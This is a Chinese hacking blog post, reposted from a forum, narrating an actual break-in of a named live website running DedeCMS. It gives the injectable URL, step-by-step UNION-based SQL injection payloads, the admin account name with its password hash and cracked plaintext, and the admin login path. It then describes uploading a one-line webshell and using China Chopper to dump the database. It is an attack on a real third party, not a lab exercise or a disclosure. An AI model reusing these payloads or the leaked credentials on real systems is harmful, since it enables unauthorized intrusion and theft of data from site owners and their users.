实战篇:织梦.PHP.Mysql注入webshell.脱库

怪狗 2016-7-29 HACK 0 0

  目标站:http://www.51team.cn/

  注入点:http://www.51team.cn/newmess.php?id=138

  找到注入点后猜字段,可用 order by 1 猜解,order by不可用时,可用union 联合查询!

  我这里猜解到的字段是22, 看图

  

实战篇:织梦.PHP.Mysql注入webshell.脱库

  接下来爆显示位!语法: and 1=2 union select1,2,4,5,...,22 字段多少就输入多少,中间太常,省略了!

  然后回车打开,页面出现了一个9的数字!如图:  

实战篇:织梦.PHP.Mysql注入webshell.脱库

  然后我们来查询下是什么版本,用户名,数据库!

  version() 版本database()当前数据库 user() 用户,要查询什么就把刚才爆出9的显示位替换掉,如图:

  

实战篇:织梦.PHP.Mysql注入webshell.脱库

  这是版本号,如果要查询用户名就把浏览器上面的9替换成 user()就行了!

  这是我查出来

  版本号:5.1.32-community

  数据库:51teamcom

  用户名:51teamcom 数据库和用户名一样!

  接下来我们来报表了, 语法 :FROM information_schema.TABLESwhere table_schema=database() limit 0,1 把浏览器里

  的9改成 table_name ,然后回车,你就会看到表了,第一个表是:dede_addonarticle 我们只要爆出的管理员的表就行了!

  我们继续爆,每爆一个就得修改下这个语法 limit 0,1 爆第2个的时候把0改成1,比如:limit 1,1 爆第3个的时候继续+1 如:limit 2,1 php中0是第一位!

  这是我爆出来的表:

以下是代码片段:
dede_addonproduct,dede_admin,dede_admintype,dede_arcatt,dede_arccache,dede_archives,dede_arcrank,dede_arctiny,ddede_arctype,dede_channeltype,dede_co_htmls,dede_co_mediaurls,dede_co_note,dede_co_urls,dede_diyforms,dede_feedback,dede_flink,dede_flinktype,dede_freelist,dede_guestbook,dede_homepageset

  织梦的程序!

  其中dede_admin 应该就是管理员的表了!我们爆下看!

  爆之前,我们先把dede_admin 转换成16进制的,就是这个 646564655F61646D696E

  语法:

以下是代码片段:
<span lang="EN-US">information_schema.columns WHERE table_name=0x646564655F61646D696E limit0</span>,<span lang="EN-US">1</span>

  还是跟上面一样,爆第几个就修改数字 0 ,把我们刚才转换的16进制放到0x后面,0x不要动,然后把显示位9的数字改成 column_name 然后就行!

  我爆的段:

以下是代码片段:
id,userid,pwd,uname,tname,email pwd

  应该就是密码,uname应该是账号,我们试试!

以下是代码片段:
and 1=2 union select 1,2,3,4,5,6...,22 from dede_admin

  把浏览器里面的语法全部去掉,剩下注入点就行,就是这样;

以下是代码片段:
http://www.51team.cn/about.php?id=10 and 1=2 union
select 1,2,3,4,5,6...,22 from dede_admin

  然后回车!

  然后把9替换成刚才我爆出来的字段 我替换了uname和pwd,开了2个浏览器!

  用户是:admin密码是:d9d2b2de067864194059 密码加密的,可到cmd5.com解密 如图:

  

实战篇:织梦.PHP.Mysql注入webshell.脱库

  密码解出来了,这个 bx2013 ,接下来找后台,可以用软件扫或者谷歌找!我找出来了:

  http://www.51team.cn/web_admin/login.php

  成功登陆:

  

实战篇:织梦.PHP.Mysql注入webshell.脱库

  随便找个上传点就行,然后上传马,先挂个txt吧,嘿嘿!http://www.51team.cn/a.txt

  接下来,脱裤咯!

  脱裤可以上传脱裤马,也可以用菜刀,我就用菜刀的吧,方便!随便找个php文件添加一句话!

  好,连接了

  

实战篇:织梦.PHP.Mysql注入webshell.脱库

  如果你是用网马脱的话,就得看网站配置文件conn.php 里面的数据库用户名和密码!

  连接后,点网站列表,然后在网址那里右键点击数据库管理,然后打开一个窗口,那个窗口就是数据库了!如图:

  

实战篇:织梦.PHP.Mysql注入webshell.脱库

原文地址:http://www.77169.com/hack/201512/221450.shtm

转载请注明来自华盟网,本文标题:《实战篇:织梦.PHP.Mysql注入webshell.脱库》

喜欢 (0) 发布评论
发表评论